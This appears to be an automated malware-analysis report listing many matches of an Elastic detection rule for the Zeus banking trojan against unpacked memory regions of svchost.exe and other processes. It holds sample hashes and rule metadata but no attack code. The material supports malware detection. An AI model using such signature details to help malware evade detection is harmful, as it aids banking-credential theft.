Source: 2.3.svchost.exe.3a40000.19.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 34.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.27f2000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.88e000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2b32000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.roundwood.exe.406400.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.40.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3c20000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.20.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2cd0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 21.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2b32000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 38.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2762000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.893000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2d63c00.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.27.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.38.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 23.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2ac0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.29f2000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.30.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2dc0000.43.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2650000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.28c2000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.29.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.34.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2c90000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 23.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2ac0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.37.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.88e000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1452000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2412000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2650000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 8.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.e70000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 29.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2d00000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3a40000.35.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.893c00.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 38.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2762000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
